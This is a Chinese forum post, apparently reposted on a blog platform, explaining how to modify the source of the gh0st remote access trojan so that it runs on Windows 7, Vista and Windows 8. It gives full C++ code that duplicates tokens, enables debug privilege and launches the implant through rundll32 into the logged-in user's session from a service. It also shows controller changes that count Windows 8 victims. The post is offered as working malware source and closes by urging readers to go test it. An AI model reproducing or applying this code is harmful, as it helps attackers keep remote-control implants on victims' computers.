gh0st支持win7和win8

打开server的until.cpp文件.在最后面#endif的上面加上下列代码

    DWORD _stdcall LaunchAppIntoDifferentSession( LPTSTR lpCommand )
    {
    DWORD dwRet = 0;
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    DWORD dwSessionId;
    HANDLE hUserToken = NULL;
    HANDLE hUserTokenDup = NULL;
    HANDLE hPToken = NULL;
    HANDLE hProcess = NULL;
    DWORD dwCreationFlags;

    HMODULE hInstKernel32 = NULL;
    typedef DWORD (WINAPI *WTSGetActiveConsoleSessionIdPROC)();
    WTSGetActiveConsoleSessionIdPROC WTSGetActiveConsoleSessionId = NULL;

    hInstKernel32 = LoadLibrary("Kernel32.dll");

    if (!hInstKernel32)
    {
    return FALSE;
    }

    WTSGetActiveConsoleSessionId = (WTSGetActiveConsoleSessionIdPROC)GetProcAddress(hInstKernel32,"WTSGetActiveConsoleSessionId");

    // Log the client on to the local computer.
    dwSessionId = WTSGetActiveConsoleSessionId();

    do
    {
    WTSQueryUserToken( dwSessionId,&hUserToken );
    dwCreationFlags = NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE;
    ZeroMemory( &si, sizeof( STARTUPINFO ) );
    si.cb= sizeof( STARTUPINFO );
    si.lpDesktop = "winsta0\\default";
    ZeroMemory( &pi, sizeof(pi) );
    TOKEN_PRIVILEGES tp;
    LUID luid;

    if( !::OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
    | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_ADJUST_SESSIONID
    | TOKEN_READ | TOKEN_WRITE, &hPToken ) )
    {
    dwRet = GetLastError();
    break;
    }
    else;

    if ( !LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &luid ) )
    {
    dwRet = GetLastError();
    break;
    }
    else;
    tp.PrivilegeCount =1;
    tp.Privileges[0].Luid =luid;
    tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;

    if( !DuplicateTokenEx( hPToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hUserTokenDup ) )
    {
    dwRet = GetLastError();
    break;
    }
    else;

    //Adjust Token privilege
    if( !SetTokenInformation( hUserTokenDup,TokenSessionId,(void*)&dwSessionId,sizeof(DWORD) ) )
    {
    dwRet = GetLastError();
    break;
    }
    else;

    if( !AdjustTokenPrivileges( hUserTokenDup, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, NULL ) )
    {
    dwRet = GetLastError();
    break;
    }
    else;

    LPVOID pEnv =NULL;

    DWORD (__stdcall *CreateEnvironmentBlock)( LPVOID *, HANDLE, BOOL );
    CreateEnvironmentBlock = (DWORD (__stdcall *)(LPVOID *, HANDLE,BOOL))GetProcAddress( LoadLibrary("UserEnv.dll"), "CreateEnvironmentBlock" );
    if (!CreateEnvironmentBlock) break;

    if( CreateEnvironmentBlock( &pEnv, hUserTokenDup, TRUE ) )
    {
    dwCreationFlags|=CREATE_UNICODE_ENVIRONMENT;
    }
    else pEnv=NULL;

    // Launch the process in the client's logon session.
    if( CreateProcessAsUser( hUserTokenDup, // client's access token
    NULL, // file to execute
    lpCommand, // command line
    NULL, // pointer to process SECURITY_ATTRIBUTES
    NULL, // pointer to thread SECURITY_ATTRIBUTES
    FALSE, // handles are not inheritable
    dwCreationFlags,// creation flags
    pEnv, // pointer to new environment block
    NULL, // name of current directory
    &si, // pointer to STARTUPINFO structure
    &pi // receives information about new process
    ) )
    {
    }
    else
    {
    dwRet = GetLastError();
    break;
    }
    }
    while( 0 );

    //Perform All the Close Handles task
    if( NULL != hUserToken )
    {
    CloseHandle( hUserToken );
    }
    else;

    if( NULL != hUserTokenDup)
    {
    CloseHandle( hUserTokenDup );
    }
    else;
    if( NULL != hPToken )
    {
    CloseHandle( hPToken );
    }
    else;
    return dwRet;
    }

然后打开until.h 同样在最后面的#endif上面加上

    DWORD _stdcall LaunchAppIntoDifferentSession( LPTSTR lpCommand );

然后打开svchost.cpp

搜索extern "C" __declspec(dllexport) void ServiceMain( int argc, wchar_t* argv[] )

在上面加上

    extern "C" __declspec(dllexport) void XiaoDeBu(HWND hwnd, HINSTANCE hinst, LPTSTR lpCmdLine, int nCmdShow )
    {
    main(lpCmdLine);
    }

搜索g_dwServiceType = QueryServiceTypeFromRegedit(svcname);在下面加上

    HANDLE hThread = NULL;
    OSVERSIONINFO OsVerInfoEx;
    OsVerInfoEx.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx(&OsVerInfoEx);
    if ( OsVerInfoEx.dwMajorVersion < 6 )//判断那种系统,如果小于6,直接用原来的代码
    {
    HANDLE hThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main, (LPVOID)svcname, 0, NULL);
    }
    else
    {
    CHAR lpCommand[256];
    CHAR Start[MAX_PATH];
    GetModuleFileName(CKeyboardManager::g_hInstance,Start,sizeof(Start));
    wsprintf(lpCommand,"rundll32.exe %s, XiaoDeBu %s",Start, svcname );
    LaunchAppIntoDifferentSession(lpCommand);
    }

然后把HANDLE hThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main, (LPVOID)svcname, 0, NULL);这句注释掉.
鼓励原创支持转载请用实际行动支持论坛发展
 
   
3#
  发表于 2012-12-21 19:14:16  |  只看该作者
上面是win7和VISTA的,下面是win8的:
gh0st支持windows8完美上线
大家都知道windows8出来了吧?就在昨天,这时候我想也是菜鸟最头痛的时候,因为你们知道不知道怎么让GH0ST能够在win8下正常操作呢?下面我们来做详细的介绍。
首先我们打开控制端说下需要修改的地方
PcView.cpp、ShowNum.cpp
这是2个需要修改的文件
我们先看下主控端
ghst修改系列

修改完毕后在PcView.cpp文件夹搜索“g_pNumDlg->SetNum(IDC_WIN_2000, g_pNumDlg->Win2000);”在下面添加

if ( LoginInfo->OsVerInfoEx.dwMajorVersion == 6 && LoginInfo->OsVerInfoEx.dwMinorVersion == 2 )
   {
    pszOS = _T("win8");
    g_pNumDlg->Win8++;
    g_pNumDlg->SetNum(IDC_WIN_8, g_pNumDlg->Win8);
   }

gh0st修改支持win8

搜索“g_pNumDlg->SetNum( IDC_WIN_2008, g_pNumDlg->Win2008 );”
在下面添加:
if ( strLogText.Find("Win8") != -1 )
     {
      g_pNumDlg->Win8--;
      g_pNumDlg->SetNum( IDC_WIN_8, g_pNumDlg->Win8 );
     }

搜索:g_pNumDlg->SetNum( IDC_WIN_2008, g_pNumDlg->Win2008 );
添加:
if ( strLogText.Find("win8") != -1 )
  {
   g_pNumDlg->Win8--;
   g_pNumDlg->SetNum( IDC_WIN_8, g_pNumDlg->Win8 );
  }

这段代码有3遍哦

搜索:if ( strLogText.Find("2008") != -1 )

添加:
if ( strLogText.Find("win8") != -1 )
  {
   g_pNumDlg->Win8--;
   g_pNumDlg->SetNum( IDC_WIN_8, g_pNumDlg->Win8 );
  }



下面开始是ShowNum.cpp文件
搜索:Win2008 = 0;
添加:
Win8 = 0;

gh0st修改支持win8
搜索:SetDlgItemInt(IDC_WIN_2008, Win2008, FALSE);
添加:
SetDlgItemInt(IDC_WIN_8, Win8, FALSE);

gh0st修改支持win8
搜索:int Win7;
添加
int Win8;

gh0st修改支持win8


哈哈这样我们就大功告成了!怎么样大家开心吧!赶紧去测试下吧!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值